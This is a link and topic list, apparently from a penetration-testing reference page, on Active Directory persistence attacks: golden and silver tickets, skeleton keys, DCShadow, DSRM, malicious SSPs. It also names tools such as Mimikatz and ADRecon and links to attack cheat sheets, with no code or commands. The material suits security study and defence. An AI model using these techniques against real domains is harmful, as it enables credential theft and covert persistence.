• Golden Ticket
SID HISTORY
SILVER TICKET
• Sneaky Active Directory Persistence #16: Computer Accounts & Domain Controller
Silver Tickets
DCSHADOW
ADMINSDHOLDER
SKELETON KEYS
• Unlocking All The Doors To Active Directory With The Skeleton Key Attack
• Skeleton Key
• Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers &
BackDoor Your Active Directory Forest
SEENABLEDELEGATIONPRIVILEGE
• The Most Dangerous User Right You (Probably) Have Never Heard Of
• Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)
DIRECTORY SERVICES RESTORE MODE
• Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)
• Shadow Admins – The Stealthy Accounts That You Should Fear The Most
• ADACLScanner - A tool with GUI or command line used to create reports of discretionary access control lists (DACLs) and system access control lists (SACLs) in Active Directory
• zBang - zBang is a risk assessment tool that detects potential privileged account threats
• ADRecon - A tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment
• Mimikatz - Utility to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory, but also to perform pass-the-hash, pass-the-ticket or build Golden tickets
https://0x1.gitlab.io/pentesting/Active-Directory-Kill-Chain-Attack-and-Defense/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/CyberSecurityUP/Red-Team-Management/tree/main/Adversary%20Emulation